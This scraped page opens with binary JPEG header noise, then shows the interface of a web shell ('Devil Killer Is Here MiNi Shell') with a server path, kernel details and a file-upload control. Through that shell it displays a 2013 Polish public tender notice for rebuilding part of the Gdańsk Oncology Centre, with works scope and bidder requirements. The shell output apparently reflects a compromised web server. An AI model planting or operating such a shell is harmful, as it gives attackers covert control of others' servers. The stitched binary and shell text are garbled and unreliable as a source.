JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131004/205163-N-2013.html

<p class="kh_header"><b>Gdańsk: Wykonanie elementów III etapu przebudowy i rozbudowy budynku B Wojewódzkiego Centrum Onkologii w Gdańsku przy Al. Zwycięstwa 31/32 wraz ze zmianą funkcjonalną pomieszczeń II piętra.</b><br>
<b>Numer ogłoszenia: 205163 - 2013; data zamieszczenia: 04.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzkie Centrum Onkologii Samodzielny Publiczny ZOZ , ul. M. Skłodowskiej-Curie 2, 80-210 Gdańsk, woj. pomorskie, tel. 058 3419348, faks 058 3419348.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wpo.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie elementów III etapu przebudowy i rozbudowy budynku B Wojewódzkiego Centrum Onkologii w Gdańsku przy Al. Zwycięstwa 31/32 wraz ze zmianą funkcjonalną pomieszczeń II piętra..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b></p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Robota budowlana: Wykonanie elementów III etapu przebudowy i rozbudowy budynku B Wojewódzkiego Centrum Onkologii w Gdańsku przy Al. Zwycięstwa 31/32 wraz ze zmianą funkcjonalną pomieszczeń II piętra, w oparciu o opracowaną i zatwierdzoną dokumentację projektową, w poniższym zakresie rzeczowym :

1)	Budowlana:
Roboty ziemne
Roboty rozbiórkowe 
Zbrojenie betonu
Beton i zaprawy
Roboty murowe
Konstrukcje metalowe
Izolacje termiczne
Hydroizolacje
Pokrycie dachowe
Posadzki i wykładziny podłogowe
Ściany działowe
Okładziny ścian i sufity
Stolarka okienna i drzwiowa, klapy, kratki nawiewne, parapety wewn.
Ślusarka, elementy metalowe i ze stali nierdzewnej
Prace dekarskie
Urządzenia sanitarne
Malowanie
Zabudowy wnęk i lady (meblarska) 
2)	Drogowa:
Rozbiórka elementów dróg
Roboty ziemne
Krawężniki i obrzeża betonowe
Obrzeża betonowe
Podbudowy
Koryto wraz z profilowaniem i zagęszczaniem podłoża
Podbudowa z kruszyw stabilizowanych mechanicznie
Nawierzchnie z kostki betonowej brukowej (kolorowej)
Nawierzchnie z płyt betonowych chodnikowych
Roboty ślusarskie

3)	Instalacje:
a)Sanitarne wodociągowe, kanalizacji sanitarnej, z.w., c.w., i c.o.
 Demontaż istniejących przewodów i osprzętu 
Roboty przygotowawcze instalacji wodociągowej
Roboty montażowe instalacji wodociągowej
 Zabezpieczenie przed korozją
 Izolacja termiczna
 Roboty przygotowawcze instalacji kanalizacji
 Roboty montażowe instalacji kanalizacji
 Roboty przygotowawcze instalacji c.o.
 Roboty montażowe instalacji c.o.
 Zabezpieczenie przed korozją instalacji c.o.
 Izolacja termiczna instalacji c.o.
 Montaż białej armatury, osprzętu i kompl. grzejników

b)Elektryczne wewnętrzne i zewnętrzne
 roboty wewnętrznej linii zasilającej
 rozbudowy istniejącej rozdzielni głównej RO
 tablicy rozdzielczej oddziałowej
 Instalacji oświetlenia ogólnego
 instalacji oświetlenia miejscowego
 instalacji oświetlenia awaryjnego i ewakuacyjnego
 instalacji gniazd wtyczkowych ogólnego przeznaczenia
 instalacji gniazd wtyczkowych zasil. komputery
 instalacji siły
instalacji ochrony p/przepięciowej  
 instalacja dodatkowej ochrony przeciwporażeniowej
 instalacja połączeń wyrównawczych miejscowych
 instalacja odgromowa na dachu wraz z wymianą pionów i otokiem wokoło budynku
 instalacja zasilania bram przesuwnych
 
c)System sygnalizacji pożaru i instalacje teletechniczne:
 wykonanie instalacji i montaż urządzeń systemu sygnalizacji pożaru (SSP) i sterowania oddymianiem
 wykonanie instalacji i montaż urządzeń systemów bezpieczeństwa ogólnego i zabezpieczenia technicz- 
   nego obiektu obejmujących: system telewizji dozoru (CCTV), system kontroli dostępu i kontroli przejść, 
   system sygnalizacji włamania, system monitoringu wizyjnego sal pacjentów;
 wykonanie instalacji i montaż urządzeń teletechnicznych obejmujących: instalacje okablowania
  strukturalnego, system przywoławczy pacjent-pielęgniarka
instalacja wideodomofonowa do furt przy bramach przesuwnych 

d)Wentylacja i klimatyzacja:
 dostawa i montaż central wentylacyjnych
 dostawa i montaż wentylatorów
 dostawa i montaż czerpni i wyrzutni
 dostawa i montaż przewodów wentylacyjnych z kształtkami
 dostawa i montaż przepustnic
 dostawa i montaż klimatyzatorów
 dostawa i montaż agregatu skraplającego
 dostawa i montaż uzbrojenia nawiewno-wywiewnego
 dostawa i montaż izolacji termiczno-akustycznej 

e)Gazy medyczne:
 instalacja gazów medycznych
 próby szczelności  instalacji
 sprawdzenie wydajności źródła


4)	Mała architektura i zagospodarowanie terenu:
 roboty rozbiórkowe: betonowe, murowe, ślusarskie, metalowe, nawierzchni utwardzonych
 roboty ziemne i niwelacyjne
 nasadzenia, przesadzenia, prześwietlenia krzewów
 urządzenie trawników i okorowanie krzewów
 wymiana istniejących bram wjazdowych na przesuwne, wymiana furt i remont ogrodzenia w rejonie bram
 roboty budowlane: betnowe, murowe, konstrukcji stalowych, dekarskie, malarskie (ogrodzenia, bramy, wiata śmietnika, przesunięcie konstrukcji chłodzącej rezonans)

2. Całe zadanie obejmuje roboty budowlane zewnętrzne oraz wewnętrzne, szczegółowo opisane w zał. nr 10 do  SIWZ; za priorytetowe uznaje się przystąpienie w pierwszej kolejności do wykonania robót wewnętrznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.11.00-9, 45.45.00.00-6, 45.33.12.10-1, 45.32.00.00-6, 45.33.22.00-5, 45.23.24.23-3, 45.33.23.00-6, 45.33.24.00-7, 45.32.00.00-6, 45.33.11.00-7, 45.44.22.00-9, 45.31.00.00-3, 45.11.12.00-0, 45.23.32.20-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.11.00-1, 45.31.42.00-3, 45.31.40.00-1, 45.31.41.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (jeżeli dotyczy).
2.	Pełnomocnictwo potwierdzające posiadanie uprawnień osoby/osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
3.	Oświadczenie o korzystaniu z podwykonawców - zał. nr 7 do SIWZ.
4.	W przypadku spółki cywilnej - pisemne pełnomocnictwo uprawniające jednego ze wspólników do występowania w imieniu wszystkich wspólników w przeprowadzonym postępowaniu
5.	W przypadku konsorcjum - należy podać informacje o wszystkich podmiotach wchodzących w skład konsorcjum i załączyć dokument, w który wszyscy wykonawcy wchodzący w skład konsorcjum ustanawiają pełnomocnika do reprezentacji.
6.	Dowód wniesienia wadium - zgodnie z treścią pkt. IX niniejszej SIWZ 
7.	Kosztorys ofertowy - sporządzony na podstawie przedmiaru robót (kosztorys jest w tym przypadku wyłącznie dokumentem pomocniczym, nie podlegający ocenie przez Zamawiającego); powinien on uwzględnić wszystkie pozycje przedmiaru, jednak wystąpienie jakichkolwiek rozbieżności pomiędzy kosztorysem ofertowym a przedmiarem robót oraz pominięcie pozycji, nie będą miały wpływu na prawidłowość obliczonej ceny oferty.
       Dokumenty mogą być przedstawione w formie oryginału lub kserokopii 
       poświadczonej na każdej stronie za zgodność z oryginałem przez Wykonawcę (poświadczenia
      zgodności musi dokonać osoba upoważniona do reprezentowania Wykonawcy). 

 Dokumenty stanowiące załączniki wymagane przez SIWZ powinny zostać wypełnione przez Wykonawcę bez  wyjątku i ściśle wg. warunków i postanowień zawartych w SIWZ - bez dokonywania w nich zmian. 

8. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy ustawy i postanowienia SIWZ dotyczące Wykonawcy, stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia, ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.

9. Za osobę/osoby uprawnioną do reprezentowania Wykonawcy w przypadku, gdy samodzielnie ubiega się o udzielenie zamówienia, uważa się:
-osoby wymienione w KRS jako uprawnione do reprezentacji 
-osoby wymienione w Zaświadczeniu o wpisie do ewidencji działalności gospodarczej
-inne osoby, o ile posiadają stosowne upoważnienia (pełnomocnictwo)
10. Za osobę/osoby uprawnioną do reprezentowania Wykonawcy w przypadku, gdy Wykonawcy wspólnie ubiegają  się o udzielenie zamówienia, uważa się:
-właściwie umocowanego wspólnika
-działających łącznie reprezentantów wszystkich Wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w   okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie min. 1 robotę budowlaną odpowiadającą swoim zakresem,  rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, wykonaną w obiektach służby zdrowia   o wartości  minimum 900 000,00, zł brutto oraz min. trzy roboty budowlane w obiektach użyteczności publicznej typu: biurowce, urzędy administracji publicznej, również o wartości min. 900 000,00 zł brutto każda;  w każdym wykazanym przypadku o kubaturze większej, niż 1 500,00 m 3, wraz z podaniem rodzaju roboty budowlanej, jej wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone: 
Dowodami, o których mowa  w pkt. 2, są:
1) poświadczenie,
2) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1.

Wykonawca w miejsce poświadczeń może przedłożyć dokumenty potwierdzające należyte wykonanie robót budowlanych, określone w § 1 ust. 1 pkt. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże , że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj. dysponuje uprawnionymi osobami, które będą uczestniczyć w kierowaniu robotami budowlanymi w zakresie - robót budowlanych, robót elektrycznych, robót sanitarnych, posiadającymi uprawnienia budowlane bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie ( w rozumieniu ustawy Prawo Budowlane) tzn: przekaże Zamawiającemu informacje na temat kwalifikacji zawodowych, doświadczenia i wykształcenia tych osób, a także zakresu wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami:

  Kierownik robót w branży  budowlanej - jedna osoba spełniająca wymagania:
	posiadająca uprawnienia budowlane w specjalności konstrukcyjno - budowlanej do kierowania robotami budowlanymi bez ograniczeń - w rozumieniu przepisów ustawy z dnia 07.07.1994 r. Prawo Budowlane (Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.) oraz zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83, poz. 578) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów
	posiadająca co najmniej 3 - letnie doświadczenie zawodowe.

 Kierownik robót w branży instalacyjnej - sanitarnej w zakresie instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych - jedna osoba spełniająca wymagania :
a)posiadająca uprawnienia budowlane w wymaganej specjalności (w zakresie  instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych) do kierowania robotami budowlanymi bez ograniczeń - w rozumieniu przepisów ustawy z dnia 07.07.1994 r. Prawo Budowlane (Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.) oraz zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83, poz. 578) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów
posiadająca co najmniej 3 - letnie doświadczenie zawodowe.

3.3. Kierownik robót w branży instalacyjnej, - elektrycznej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych - jedna osoba spełniająca wymagania:
a) posiadająca uprawnienia budowlane w wymaganej specjalności (w zakresie  instalacji i urządzeń elektrycznych i elektroenergetycznych) do kierowania robotami budowlanymi bez ograniczeń - w rozumieniu przepisów ustawy z dnia 07.07.1994 r. Prawo Budowlane (Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.) oraz zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83, poz. 578) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów
      b)  posiadająca co najmniej 3 - letnie doświadczenie zawodowe.

Uwaga! Zgodnie z art. 12a ustawy prawo budowlane samodzielne funkcje techniczne w 
budownictwie, określone w art. 12 ust. 1, mogą również wykonywać osoby, których
odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w
przepisach odrębnych. W związku z tym Zamawiający określając wymogi dla każdej
osoby w zakresie posiadanych uprawnień budowlanych dopuszcza, odpowiadające im
uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz
Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy
prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych
nabytych w państwach członkowskich Unii Europejskiej.
Ponadto, Zamawiający uzna spełnienie wyżej wymienionych wymagań, jeżeli
osoby posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r.
prawo budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania
zawodowego, odpowiednie do realizacji przedmiotu zamówienia, do pełnienia
samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do
pełnienia tych funkcji w dotychczasowym zakresie.
Przed przystąpieniem do prac budowlanych Wykonawca będzie zobowiązany
złożyć Zamawiającemu potwierdzenie aktualnego wpisu do właściwej izby samorządu
zawodowego wszystkich osób, od których jest wymagane posiadanie uprawnień
budowlanych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości minimum 900 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykaz robót budowlanych, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania, według wzoru - stanowiącego zał. nr 11 do SIWZ oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone
Uwaga:
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

